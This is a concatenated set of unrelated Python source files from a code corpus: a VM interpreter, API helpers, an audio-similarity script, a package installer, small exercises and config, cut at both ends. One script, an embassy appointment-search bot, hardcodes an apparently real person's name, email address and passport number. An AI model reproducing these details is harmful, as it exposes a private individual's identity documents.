+= 1\n dest = self.get_constant(self.ip.to_int())\n if not checkAddress(self, dest):\n return(\"RuntimeError: Jump to address \"+str(dest)+\" failed\")\n else:\n if self.debug: print('│ >>> jumping to address',dest)\n self.ic = dest-1\ndef OP_JMIF(self):\n self.ic += 1\n dest = self.get_constant(self.ip.to_int())\n # self.ic += 1\n if not self.f:\n if self.debug:\n print('│ >>> not jumping to address', dest)\n return\n if not checkAddress(self, dest):\n return(\"RuntimeError: Jump to address \"+str(dest)+\" failed\")\n else:\n if self.debug: print('│ >>> jumping to address',dest)\n self.ic = dest-1\ndef OP_JIFN(self):\n self.ic += 1\n dest = self.get_constant(self.ip.to_int())\n # self.ic += 1\n if self.f:\n if self.debug:\n print('│ >>> not jumping to address', dest)\n return\n if not checkAddress(self, dest):\n return(\"RuntimeError: Jump to address \"+str(dest)+\" failed\")\n else:\n if self.debug: print('│ >>> jumping to address',dest)\n self.ic = dest-1\ndef OP_CALL(self):\n self.ic += 1\n dest = self.get_constant(self.ip.to_int())\n # self.ic += 1\n if not checkAddress(self, dest):\n return(\"RuntimeError: Call to address \"+str(dest)+\" failed\")\n else:\n if self.debug: print('│ >>> jumping to address',dest)\n self.push_ret(self.ic)\n self.ic = dest-1\ndef OP_CAIF(self):\n self.ic += 1\n dest = self.get_constant(self.ip.to_int())\n # self.ic += 1\n if not self.f:\n if self.debug:\n print('│ >>> not calling address',dest)\n return\n if not checkAddress(self, dest):\n return(\"RuntimeError: Call to address \"+str(dest)+\" failed\")\n else:\n if self.debug: print('│ >>> calling address',dest)\n self.ret_push(self.ic)\n self.ic = dest-1\ndef OP_CIFN(self):\n self.ic += 1\n dest = self.get_constant(self.ip.to_int())\n # self.ic += 1\n if self.f:\n if self.debug:\n print('│ >>> not calling address',dest)\n return\n if not checkAddress(self, dest):\n return(\"RuntimeError: Call to address \"+str(dest)+\" failed\")\n else:\n if self.debug: print('│ >>> calling address',dest)\n self.ret_push(self.ic)\n self.ic = dest-1\ndef OP_RET(self):\n dest = self.pop_ret()\n if not checkAddress(self, dest):\n return(\"RuntimeError: Return to address \"+str(dest)+\" failed\")\n else:\n if self.debug: print('│ >>> returning to address',dest+1)\n self.ic = dest\n\ndef OP_INC(self):\n self.a += 1\n if self.debug: print('│ >>> incrementing')\ndef OP_DEC(self):\n self.a -= 1 if self.a > 0 else 0\n if self.debug: print('│ >>> decrementing')\n\ndef OP_NEWA(self):\n key = len(self.ptr_pool) + 1\n self.ptr_pool[key] = []\n self.a = key\n if self.debug: print('│ >>> created new array with pointer',key)\ndef OP_PUSA(self):\n self.ic += 1\n val = self.get_constant(self.ip.to_int())\n self.get_array(self.a).append(val)\n if self.debug: print('│ >>> appended',val,'to array')\ndef OP_POPA(self):\n # self.ic += 1\n val = self.get_array(self.a).pop()\n self.stack.append(val)\n if self.debug: print('│ >>> popped',val,'from array onto stack')\ndef OP_SPLT(self):\n olda = self.a\n for item in self.get_array(self.a):\n self.a = item\n self.push()\n self.a = olda\n if self.debug: print('│ >>> split array',\n formatlist_items(self.get_array(self.a), 10),'onto the stack')\ndef OP_JOIN(self):\n key = len(self.ptr_pool) + 1\n self.a = key\n arr = []\n for item in self.stack:\n arr.append(item)\n self.ptr_pool[key] = arr\n if self.debug: print('│ >>> joined stack as array')\n\ndef OP_PUSB(self):\n self.ic += 1\n dest = int(self.get_constant(self.ip.to_int()))\n if not checkAddress(self, dest):\n return(\"RuntimeError: Push byte to address \"+str(dest)+\" failed\")\n else:\n # print(int(self.a))\n if not (int(self.a) >= 0x00 and int(self.a) <= 0xff):\n return(\"RuntimeError: Push byte to address \"+str(int(self.a))+' failed')\n\n if self.debug:\n print('│ >>> pushing byte', Byte(self.a).to_hex(),'to', dest)\n \n self.bytes[dest] = Byte(int(self.a))\n if self.address_to_pixel(dest):\n row, column = self.address_to_pixel(dest)\n self.prunepixel(row, column)\ndef OP_GETB(self):\n self.ic += 1\n dest = self.get_constant(self.ip.to_int())\n if not checkAddress(self, dest):\n return(\"RuntimeError: Get byte from address \"+str(dest)+\" failed\")\n else:\n self.a = self.bytes[dest-1].to_int()\n if self.debug: print('│ >>> getting byte', self.a,'from', dest)\n\ndef OP_NVAR(self):\n self.ic += 1\n varname = self.get_constant(self.ip.to_int(), False)\n # self.ic -= 1\n # print('nvar',varname)\n if self.debug: print('│ >>> creating new variable',varname)\n self.hashtable.insert(varname, 0)\ndef OP_DVAR(self):\n self.ic += 1\n varname = self.get_constant(self.ip.to_int(), False)\n # self.ic -= 1\n # print('dvar',varname)\n if self.debug: print('│ >>> deleting variable',varname)\n self.hashtable.remove(varname)\ndef OP_PUVA(self):\n self.ic += 1\n varname = self.get_constant(self.ip.to_int(), False)\n # self.ic -= 1\n # print('puva',varname)\n if self.debug: print('│ >>> pushing',self.a,'to variable',varname)\n self.hashtable.replace(varname, self.a)\ndef OP_LOVA(self):\n self.ic += 1\n varname = self.get_constant(self.ip.to_int(), False)\n # self.ic -= 1\n # print('lova',varname)\n self.a = self.hashtable.find(varname)\n if self.debug: print('│ >>> loading',self.a,'from variable',varname)\ndef OP_INCV(self):\n self.ic += 1\n varname = self.get_constant(self.ip.to_int(), False)\n if self.debug: print('│ >>> incrementing variable',varname)\n self.hashtable.replace(varname, self.hashtable.find(varname)+1)\ndef OP_DECV(self):\n self.ic += 1\n varname = self.get_constant(self.ip.to_int(), False)\n if self.debug: print('│ >>> decrementing variable',varname)\n self.hashtable.replace(varname, self.hashtable.find(varname)-1)\n\ndef OP_OPEF(self):\n self.ic += 1\n name = ''.join([chr(x) for x in self.get_array(self.get_constant(self.ip.to_int()))])\n self.ic += 1\n\n # nibble represents mode:\n # 0b1111\n # │││└ binary=0 text=1\n # ││└ append\n # │└ write\n # └ read\n \n mode = self.get_constant(self.ip.to_int())\n if mode < 0x0 or mode > 0xf:\n # invalid mode\n return(\"RuntimeError: invalid file mode \"+str(bin(mode)))\n bits = [int(x) for x in bin(mode)[2:]]\n while len(bits) < 4:\n bits.insert(0, 0)\n\n if bits[:3] == [0,0,0]:\n return(\"RuntimeError: invalid file mode 0b\"+ ''.join([str(x) for x in bits]) +\\\n ' (at least read, write or append)')\n\n modestr = str()\n if bits[0]: # read\n modestr = 'r'\n\n if bits[1]: # write\n if bits[0]: modestr = 'r+' # also read\n else: modestr = 'w' # just write\n \n elif bits[2]: # append (skipped if already writing)\n if bits[0]: modestr = 'a+' # also read\n else: modestr = 'a' # just append\n \n if not bits[3]: # binary mode\n modestr = modestr.replace('+', 'b+') if '+' in modestr else modestr + 'b'\n \n # opening n shit\n try:\n key = len(self.file_pool) + 1\n self.file_pool[key] = open(self.translate_filename(name), modestr)\n if self.debug: print('│ >>> opening file',name,'with mode',modestr,'with pointer',key)\n self.a = key\n except FileNotFoundError:\n if self.debug: print('│ >>> failed to open file',name,'(file not found)')\ndef OP_CLOF(self):\n self.ic += 1\n key = int(self.get_constant(self.ip.to_int()))\n if key in self.file_pool:\n self.file_pool[key].close()\n self.file_pool.pop(key)\n if self.debug: print('│ >>> closing file with pointer',key)\n elif self.debug: print('│ >>> failed to close file with pointer',key,'(not in file pool)')\ndef OP_SEKF(self):\n self.ic += 1\n key = int(self.get_constant(self.ip.to_int()))\n self.ic += 1\n pos = int(self.get_constant(self.ip.to_int()))\n if key in self.file_pool:\n self.file_pool[key].seek(pos)\n if self.debug: print('│ >>> seeking to',pos,'in file with pointer',key)\ndef OP_WRTF(self):\n self.ic += 1\n key = int(self.get_constant(self.ip.to_int()))\n self.ic += 1\n text = ''.join([chr(x) for x in self.get_array(self.get_constant(self.ip.to_int()))])\n if key in self.file_pool and self.file_pool[key].writable():\n self.file_pool[key].write(text)\n if self.debug: print('│ >>> writing \"'+text+'\" to file with pointer',key)\n elif self.debug: print('│ >>> failed to write to file with pointer',key)\ndef OP_REAF(self):\n self.ic += 1\n key = int(self.get_constant(self.ip.to_int()))\n self.ic += 1\n length = int(self.get_constant(self.ip.to_int()))\n if key in self.file_pool and self.file_pool[key].readable():\n arg = [length] if length else [] \n text = self.file_pool[key].read(*arg)\n textarr = [ord(char) if isinstance(char, str) else char for char in text]\n # textarr.reverse()\n ptr = len(self.ptr_pool) + 1\n self.ptr_pool[ptr] = textarr\n self.a = ptr\n if self.debug: print('│ >>> reading from file with pointer',key,'to array with pointer',ptr)\n\ndef OP_MAKF(self):\n self.ic += 1\n name = ''.join([chr(x) for x in self.get_array(self.get_constant(self.ip.to_int()))])\n open(self.translate_filename(name), 'a').close()\n if self.debug: print('│ >>> touched file',name)\ndef OP_DELF(self):\n self.ic += 1\n name = ''.join([chr(x) for x in self.get_array(self.get_constant(self.ip.to_int()))])\n os.remove(self.translate_filename(name))\n if self.debug: print('│ >>> deleted file',name)\n\ndef OP_CLST(self):\n self.stack = []\n if self.debug: print('│ >>> clearing stack')\ndef OP_POLL(self):\n self.poll()\n if self.debug: print('│ >>> polling')\ndef OP_WAIT(self):\n self.ic += 1\n sec = self.get_constant(self.ip.to_int())\n if self.debug: print('│ >>> sleeping for',sec,'seconds')\n return [\"sleep\", sec]\ndef OP_KILL(self):\n self.bytes[0] = Byte(0)\n if self.debug: print('│ >>> killing')\n\nclass Ins:#truction\n def __init__(self, byte: Byte, offset_sensitive, *args): # Byte, *args):\n # self.byte = Byte(byte)\n self.byte = Byte(byte)\n # list with arg types\n self.args = args\n self.argc = len(args)\n self.offset_sensitive = offset_sensitive\n self.func: Callable = None\n\nsln = ln()+2\nclass Instruct(Enum):\n NOI = Ins(ln(sln), False)\n # stack\n PUSH = Ins(ln(sln), False)\n POP = Ins(ln(sln), False)\n LOAD = Ins(ln(sln), False, float)\n LODA = Ins(ln(sln), False, list)\n STSI = Ins(ln(sln), False)\n SWAP = Ins(ln(sln), False)\n # arithmetic\n ADD = Ins(ln(sln), False)\n SUB = Ins(ln(sln), False)\n MUL = Ins(ln(sln), False)\n DIV = Ins(ln(sln), False)\n NEG = Ins(ln(sln), False)\n # io\n INPT = Ins(ln(sln), False)\n PRNT = Ins(ln(sln), False)\n PRNC = Ins(ln(sln), False)\n PRNS = Ins(ln(sln), False)\n PRNA = Ins(ln(sln), False)\n # control flow\n CMP = Ins(ln(sln), False)\n JMP = Ins(ln(sln), True, int)\n JMIF = Ins(ln(sln), True, int)\n JIFN = Ins(ln(sln), True, int)\n CALL = Ins(ln(sln), True, int)\n CAIF = Ins(ln(sln), True, int)\n CIFN = Ins(ln(sln), True, int)\n RET = Ins(ln(sln), False)\n # register manipulation\n INC = Ins(ln(sln), False)\n DEC = Ins(ln(sln), False)\n # array\n NEWA = Ins(ln(sln), False)\n PUSA = Ins(ln(sln), False, int)\n POPA = Ins(ln(sln), False)\n SPLT = Ins(ln(sln), False)\n JOIN = Ins(ln(sln), False)\n # byte manipulation\n PUSB = Ins(ln(sln), True, int)\n GETB = Ins(ln(sln), True, int)\n # variable\n NVAR = Ins(ln(sln), False, id)\n DVAR = Ins(ln(sln), False, id)\n PUVA = Ins(ln(sln), False, id)\n LOVA = Ins(ln(sln), False, id)\n INCV = Ins(ln(sln), False, id)\n DECV = Ins(ln(sln), False, id)\n # file io\n OPEF = Ins(ln(sln), False, str, int)\n CLOF = Ins(ln(sln), False, int)\n SEKF = Ins(ln(sln), False, int, int)\n WRTF = Ins(ln(sln), False, int, str)\n REAF = Ins(ln(sln), False, int, int)\n MAKF = Ins(ln(sln), False, str)\n DELF = Ins(ln(sln), False, str)\n #RENF = Ins(ln(sln), False, int, str)\n #GFID = Ins(ln(sln), False, str, int)\n # misc.\n CLST = Ins(ln(sln), False)\n WAIT = Ins(ln(sln), False, float)\n POLL = Ins(ln(sln), False)\n KILL = Ins(ln(sln), False)\n\ndef getinstruct(byteval: int):\n for instruct in Instruct:\n if instruct.value.byte == byteval:\n return instruct\n return False\n\nfor op in Instruct:\n if 'OP_'+op.name not in locals():\n raise NotImplementedError(op.name)\n op.value.func = eval('OP_'+op.name)\n# print('\\n'.join([op.name +' '+str(op.value.byte.to_int()) for op in Instruct]))\n","sub_path":"src/instructions.py","file_name":"instructions.py","file_ext":"py","file_size_in_byte":16277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"276580286","text":"import requests\nimport base64\n\ndef twitter_session(api_key, api_secret):\n session = requests.Session()\n secret = '{}:{}'.format(api_key, api_secret)\n secret64 = base64.b64encode(secret.encode('ascii')).decode('ascii')\n\n headers = {\n 'Authorization': 'Basic {}'.format(secret64),\n 'Host': 'api.twitter.com',\n }\n\n r = session.post('https://api.twitter.com/oauth2/token',\n headers=headers,\n data={'grant_type': 'client_credentials'})\n\n bearer_token = r.json()['access_token']\n\n def bearer_auth(req):\n req.headers['Authorization'] = 'Bearer ' + bearer_token\n return req\n\n session.auth = bearer_auth\n return session\n","sub_path":"twitterwall/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"387198665","text":"# Your code here\n# initialize cache\ncache = {}\n\ndef expensive_seq(x, y, z):\n # if x, y, z is in cache return value from cache\n if f\"{x},{y},{z}\" in cache:\n return cache[f\"{x},{y},{z}\"]\n # if x,y,z not in cache run logic, store solution in cache, and return solution\n else:\n if x <= 0:\n solution = y + z\n cache[f\"{x},{y},{z}\"] = solution\n return solution\n elif x > 0:\n solution = expensive_seq(x-1, y+1, z) + expensive_seq(x-2, y+2, z*2) + expensive_seq(x-3, y+3, z*3)\n cache[f\"{x},{y},{z}\"] = solution\n return solution\n\n\nif __name__ == \"__main__\":\n for i in range(10):\n x = expensive_seq(i*2, i*3, i*4)\n print(f\"{i*2} {i*3} {i*4} = {x}\")\n\n print(expensive_seq(150, 400, 800))\n","sub_path":"applications/expensive_seq/expensive_seq.py","file_name":"expensive_seq.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"16468135","text":"import librosa\nimport numpy as np\nimport paddle.fluid as fluid\n\n# 创建执行器\nplace = fluid.CPUPlace()\nexe = fluid.Executor(place)\nexe.run(fluid.default_startup_program())\n\n# 保存预测模型路径\nsave_path = 'models/infer'\n\n\n[infer_program,\n feeded_var_names,\n target_var] = fluid.io.load_inference_model(dirname=save_path, executor=exe)\n\n\n# 读取音频数据\ndef load_data(data_path):\n wav, sr = librosa.load(data_path, sr=16000)\n intervals = librosa.effects.split(wav, top_db=20)\n wav_output = []\n for sliced in intervals:\n wav_output.extend(wav[sliced[0]:sliced[1]])\n # [可能需要修改] 裁剪的音频长度:16000 * 秒数\n wav_len = int(16000 * 2.04)\n # 裁剪过长的音频,过短的补0\n if len(wav_output) > wav_len:\n wav_output = wav_output[:wav_len]\n else:\n wav_output.extend(np.zeros(shape=[wav_len - len(wav_output)], dtype=np.float32))\n wav_output = np.array(wav_output)\n # 获取梅尔频谱\n ps = librosa.feature.melspectrogram(y=wav_output, sr=sr, hop_length=256).astype(np.float32)\n ps = ps[np.newaxis, np.newaxis, ...]\n return ps\n\n\ndef infer(audio_path):\n data = load_data(audio_path)\n # 执行预测\n feature = exe.run(program=infer_program,\n feed={feeded_var_names[0]: data},\n fetch_list=target_var)[0]\n return feature[0]\n\n\nif __name__ == '__main__':\n # 要预测的两个人的音频文件\n person1 = 'dataset/ST-CMDS-20170001_1-OS/20170001P00001A0101.wav'\n person2 = 'dataset/ST-CMDS-20170001_1-OS/20170001P00001A0001.wav'\n feature1 = infer(person1)\n feature2 = infer(person2)\n # 对角余弦值\n dist = np.dot(feature1, feature2) / (np.linalg.norm(feature1) * np.linalg.norm(feature2))\n if dist > 0.7:\n print(\"%s 和 %s 为同一个人,相似度为:%f\" % (person1, person2, dist))\n else:\n print(\"%s 和 %s 不是同一个人,相似度为:%f\" % (person1, person2, dist))\n","sub_path":"infer_contrast.py","file_name":"infer_contrast.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"570999444","text":"\"\"\"\nInstall MSL packages.\n\"\"\"\nimport subprocess\nimport sys\n\nfrom . import utils\n\n# Fixes issue #8 (repository name != package name)\n# Not sure how to generalize a universal solution since one is free to choose\n# any repository name and package name, therefore this mapping will need to be\n# updated on a case-by-case basis in future releases of msl-package-manager\n#\n# key: repo name, value: package (egg) name\n_egg_name_map = {\n 'pr-omega-logger': 'omega-logger',\n 'pr-single-photons': 'photons',\n 'pr-superk-mono': 'superk-mono',\n 'pr-webpage-text': 'webpage-text',\n 'rpi-ocr': 'ocr',\n 'rpi-smartgadget': 'smartgadget',\n}\n\n\ndef install(*names, **kwargs):\n \"\"\"Install MSL packages.\n\n MSL packages can be installed from PyPI packages_ (only if a release has been\n uploaded to PyPI) or from GitHub repositories_.\n\n .. note::\n If the MSL packages_ are available on PyPI then PyPI is used as the default\n location to install the package. If you want to force the installation to occur\n from the ``main`` branch from GitHub (even though the package is available on PyPI)\n then set ``branch='main'``. If the package is not available on PyPI\n then the ``main`` branch is used as the default installation location.\n\n .. _repositories: https://github.com/MSLNZ\n .. _packages: https://pypi.org/search/?q=%22Measurement+Standards+Laboratory+of+New+Zealand%22\n\n .. versionchanged:: 2.4.0\n Added the `pip_options` keyword argument.\n\n .. versionchanged:: 2.5.0\n Added the `commit` keyword argument. The default name of a\n repository branch changed to ``main``.\n\n Parameters\n ----------\n *names\n The name(s) of the MSL package(s) to install. If not specified then\n install all MSL packages that begin with the ``msl-`` prefix. The\n ``msl-`` prefix can be omitted (e.g., ``'loadlib'`` is equivalent to\n ``'msl-loadlib'``). Also accepts shell-style wildcards (e.g., ``'pr-*'``).\n **kwargs\n * branch -- :class:`str`\n The name of a git branch to install. If not specified and neither a\n `tag` nor `commit` was specified then the ``main`` branch is used to\n install a package if it is not available on PyPI.\n * commit -- :class:`str`\n The hash value of a git commit to use to install a package.\n * tag -- :class:`str`\n The name of a git tag to use to install a package.\n * update_cache -- :class:`bool`\n The information about the MSL packages_ that are available on PyPI and about\n the repositories_ that are available on GitHub are cached to use for subsequent\n calls to this function. After 24 hours the cache is automatically updated. Set\n `update_cache` to be :data:`True` to force the cache to be updated when you call\n this function. Default is :data:`False`.\n * yes -- :class:`bool`\n If :data:`True` then don't ask for confirmation before installing.\n The default is :data:`False` (ask before installing).\n * pip_options -- :class:`list` of :class:`str`\n Optional arguments to pass to the ``pip install`` command,\n e.g., ``['--retries', '10', '--user']``\n\n \"\"\"\n # TODO Python 2.7 does not support named arguments after using *args\n # we can define yes=False, branch=None, ...\n # in the function signature when we choose to drop support for Python 2.7\n utils._check_kwargs(kwargs, {'yes', 'branch', 'commit', 'tag', 'update_cache', 'pip_options'})\n\n yes = kwargs.get('yes', False)\n branch = kwargs.get('branch', None)\n commit = kwargs.get('commit', None)\n tag = kwargs.get('tag', None)\n update_cache = kwargs.get('update_cache', False)\n pip_options = kwargs.get('pip_options', [])\n\n if commit and not utils.has_git:\n utils.log.error('Cannot install from a commit because git is not installed')\n return\n\n github_suffix = utils._get_github_url_suffix(branch=branch, commit=commit, tag=tag)\n if github_suffix is None:\n return\n\n # keep the order of the log messages consistent: pypi -> github -> local\n # utils._create_install_list() does github -> local\n pkgs_pypi = utils.pypi(update_cache)\n packages = utils._create_install_list(names, branch, commit, tag, update_cache)\n if not packages:\n utils.log.info('No MSL packages to install')\n return\n\n utils._log_install_uninstall_message(\n packages, 'INSTALLED', branch=branch, commit=commit, tag=tag, pkgs_pypi=pkgs_pypi\n )\n if not (yes or utils._ask_proceed()):\n return\n\n utils.log.info('')\n\n zip_extn = 'zip' if utils._IS_WINDOWS else 'tar.gz'\n exe = [sys.executable, '-m', 'pip', 'install']\n\n if '--quiet' not in pip_options or '-q' not in pip_options:\n pip_options.extend(['--quiet'] * utils._pip_quiet)\n if '--disable-pip-version-check' not in pip_options:\n pip_options.append('--disable-pip-version-check')\n\n for name, values in packages.items():\n if name in pkgs_pypi and not (branch or commit or tag):\n utils.log.debug('Installing %r from PyPI', name)\n if values['extras_require']:\n name += values['extras_require']\n if values['version_requested']:\n name += values['version_requested']\n subprocess.call(exe + pip_options + [name])\n else:\n utils.log.debug('Installing %r from GitHub[%s]', name, github_suffix)\n if commit or utils.has_git:\n repo = 'git+https://github.com/MSLNZ/{}.git@{}'.format(name, github_suffix)\n else:\n repo = 'https://github.com/MSLNZ/{}/archive/{}.{}'.format(name, github_suffix, zip_extn)\n\n egg_name = _egg_name_map.get(name, name)\n repo += '#egg={}'.format(egg_name)\n if values['extras_require']:\n repo += values['extras_require']\n subprocess.call(exe + pip_options + [repo])\n","sub_path":"msl/package_manager/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":6027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"405581049","text":"import numpy as np\nimport pandas as pd\nimport matplotlib as plt\n\ndata = pd.read_excel(r\"C:\\Users\\Administrator\\Desktop\\data.xlsx\")\ndata = data.values\nprint(data)\n\ncolumns=[\"15plot1\",\"15plot2\",\"15plot3\",\"15plot4\",\"16plot1\",\"16plot2\",\"16plot3\",\"16plot4\",\"17plot1\",\"17plot2\",\"17plot3\",\"17plot4\"]# 横坐标数值\nrows=['species %d' %x for x in range(38)]# 表格第一列名称\n \nvalues = np.arange(0, 1, 0.1) # 纵坐标数值\nn_rows = len(data)\n\nindex = np.arange(len(columns)) + 0.3\nbar_width = 0.4\n\ncolor = plt.cm.paired(np.linspace(0, 0.5, len(rows)))\n#color = [\"red\",\"limegreen\",\"darkorange\",\"black\",\"gold\",\"blue\",\"c\",\"yellow\",\"tan\",\"silver\",\"g\",\"plum\",\"pink\",\"cyan\",\"slategray\",\"violet\",\"wheat\",\"lightcyan\",\"biege\",\"steelblue\",\"tomato\",\"peru\",\"lawngreen\",\"darkcyan\",\"palegreen\",\"indigo\",\"skyblue\",\"teal\",\"navy\",\"hotpink\",\"crimson\",\"cornsilk\",\"darkseagreen\",\"darkkhaki\",\"brown\",\"lightcoral\",\"burlywood\",\"darkslategray\"]\ny_offset = np.array([0.0] * len(columns))\n\n# 绘制条形图\ncell_text = []\nfor row in range(n_rows):\n plt.bar(index, data[row], bar_width, bottom=y_offset, color = plt.cm.coolwarm(range(38)))\n y_offset = y_offset + data[row]\n\nfmt='%.2f%%'\n#yticks = plt.ticker.FormatStrFormatter(fmt)\n\nplt.ylabel(\"ra\")\nplt.xlabel(columns)\nplt.yticks()\nplt.xticks([])\nplt.legend(loc=0)\n\nplt.show()","sub_path":"谱图/plotx.py","file_name":"plotx.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"410822094","text":"from setuptools import setup, find_packages\n\n\n# Package metadata\nmetadata = {}\nwith open('plasmapy/_metadata.py', 'r') as metadata_file:\n exec(metadata_file.read(), metadata)\n\n# Requirements\nwith open('requirements/base.txt', 'r') as req_file:\n requirements = req_file.read().splitlines()\n\nsetup(name=metadata['name'],\n version=metadata['version'],\n description=\"Python package for plasma physics\",\n requires=requirements,\n install_requires=requirements,\n provides=[metadata['name']],\n author=metadata['author'],\n author_email=\"namurphy@cfa.harvard.edu\", # until we get an email address\n license=\"BSD\",\n url=\"https://github.com/PlasmaPy/PlasmaPy\", # until we make a webpage\n long_description=metadata['description'],\n keywords=['plasma', 'plasma physics', 'science'],\n classifiers=[\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3 :: Only',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Scientific/Engineering :: Physics',\n 'Topic :: Scientific/Engineering :: Astronomy',\n 'Development Status :: 2 - Pre-Alpha',\n ],\n packages=find_packages(),\n zip_safe=False,\n use_2to3=False,\n python_requires='>=3.6',\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"174493845","text":"class Solution:\n def maskPII(self, S):\n \"\"\"\n :type S: str\n :rtype: str\n \"\"\"\n if '@' in S:\n return self.mask_email(S)\n else:\n return self.mask_phone(S)\n\n def mask_email(self, S):\n name, tail = S.split('@')\n name = name[0] + '*' * 5 + name[-1]\n masked = name.lower() + '@' + tail.lower()\n return masked\n\n def mask_phone(self, S):\n numbers = []\n for ch in S:\n if ch.isdigit():\n numbers.append(ch)\n masked = None\n if len(numbers) == 10:\n masked = '***-***-' + ''.join(numbers[-4:])\n else:\n masked = '+' + '*' * (len(numbers) - 10) + '-***-***-' + ''.join(numbers[-4:])\n return masked\n","sub_path":"831.py","file_name":"831.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"221338358","text":"import click\nfrom AppointmentSearch_1min import AppointmentSearch\n\n\n@click.command()\n@click.argument('i')\n# @click.option('--model-weights')\n@click.option(\"--long_term\", default=0)\n@click.option(\"--timed\", default=0)\n# @click.option(\"--n_gpu\", type=int, default=1, help='Specify the number of GPUs to be used '\n# 'If both n_gpus and gpus are set, then gpus flag will take priority')\ndef main(i,long_term,timed):\n\n params = {\n 'long_term': long_term,\n 'timed': timed,\n 'app_link': 'https://service2.diplo.de/rktermin/extern/appointment_showMonth.do?locationCode=isla&request_locale=en&realmId=108&categoryId=203&dateStr=20.05.2018',\n 'first_name': 'NIGAR HASAN',\n 'last_name': 'SIDDIQUI',\n 'email': 'thanrim@yahoo.com',\n 'repeat_email': 'thanrim@yahoo.com',\n 'passnummer': 'CD5464164',\n 'lower_date': '20.05.2018',\n 'upper_date': '15.06.2018',\n 'img_path': 'data/bot_testing/'+i+'/1',\n 'wrong_cap_dir': 'data/bot_testing/wrong_caps/',\n 'cap_fail_msg': 'entered text was',\n 'no_app_msg': 'New appointments will be made available',\n 'other_month_msg': 'Please select another month',\n 'app_available_msg': 'Please select a date',\n 'odd_path': 'data/bot_testing/curious_case_of_benjamin_button.txt',\n 'txt_file': 'data/bot_testing/1.txt',\n 'iter_id': 1\n\n }\n\n a = AppointmentSearch(params)\n a.search_bot()\n\nif __name__ == '__main__':\n main()\n","sub_path":"run_bot_jehanzeb.py","file_name":"run_bot_jehanzeb.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"344995606","text":"# AAR Natural Language Processing/Machine Learning Project 2015-2016\n# Summarizes text using tf-idf technique\n# Written by Gautam Mittal\n# Mentor: Robert Cheung\n# Requires Node.js and Python 2.7\n\nfrom __future__ import division\nimport math\nfrom textblob import TextBlob as tb\n\ndef tf(word, blob):\n return blob.words.count(word) / len(blob.words)\n\ndef n_containing(word, bloblist):\n return sum(1 for blob in bloblist if word in blob)\n\ndef idf(word, bloblist):\n return math.log(len(bloblist) / (1 + n_containing(word, bloblist)))\n\ndef tfidf(word, blob, bloblist):\n return tf(word, blob) * idf(word, bloblist)\n\ndef summarize(document1):\n document1 = tb(document1)\n bloblist = document1.sentences\n relevance_scores = []\n relevancy = {}\n for i, blob in enumerate(bloblist):\n # print \"Top words in sentence \" + str(i)\n scores = {word: tfidf(word, blob, bloblist) for word in blob.words}\n sorted_words = sorted(scores.items(), key=lambda x: x[1], reverse=True)\n relevance = 0\n sum_relevancy = 0\n for word, score in sorted_words:\n # print \"\\tWord: {}, TF-IDF: {}\".format(word, score)\n sum_relevancy += score\n relevance = sum_relevancy/len(sorted_words)\n relevance_scores.append(relevance)\n relevancy[str(i)] = relevance\n\n relevance_scores.sort(reverse=True)\n\n final_sentences = []\n num_top_results = 3\n if len(bloblist) < 3:\n num_top_results = 1\n for s in range(0, len(relevance_scores[:num_top_results])):\n for key in relevancy:\n if relevancy[key] == relevance_scores[s]:\n final_sentences.append(int(key))\n\n final_sentences.sort()\n final_text = \"\"\n for x in range(0, len(final_sentences)):\n if x != 0:\n final_text += \" \" + str(document1.sentences[final_sentences[x]]).replace('\\n', '')\n else:\n final_text = str(document1.sentences[final_sentences[x]]).replace('\\n', '')\n\n return str(final_text)\n","sub_path":"summarize.py","file_name":"summarize.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"458215996","text":"from django.conf.urls.defaults import *\nfrom django.conf import settings\n# Feed:\nfrom feeds import *\n\n# Sitemap\nfrom django.contrib.sitemaps import FlatPageSitemap, GenericSitemap\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nfrom blog.models import *\n\nsite_feeds = {\n\t'rss': RssLatestEntries,\n\t'atom': AtomLatestEntries,\n}\n\nentry_info_dict = {\n\t\"queryset\": Post.objects.all(), \n\t\"date_field\": 'pub_date',\n}\n\nsitemaps = {\n\t\"flatpages\": FlatPageSitemap,\n\t\"post\": GenericSitemap(entry_info_dict, priority = 0.5),\n}\n\nurlpatterns = patterns('',\n # Uncomment the admin/doc line below and add 'django.contrib.admindocs' \n # to INSTALLED_APPS to enable admin documentation:\n # (r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n (r'^$', include('blog.urls')),\n (r'^admin/(.*)', admin.site.root),\n\t(r'^grappelli/', include('grappelli.urls')),\n\t(r'^comments/', include('django.contrib.comments.urls')),\n\t(r'^sitemap\\.xml$', 'django.contrib.sitemaps.views.sitemap', {'sitemaps': sitemaps}),\n\t(r'^feeds/(?P.*)/$', 'django.contrib.syndication.views.feed',{'feed_dict':site_feeds}),\n\t(r'medias/(?P.*)$', 'django.views.static.serve', {'document_root': 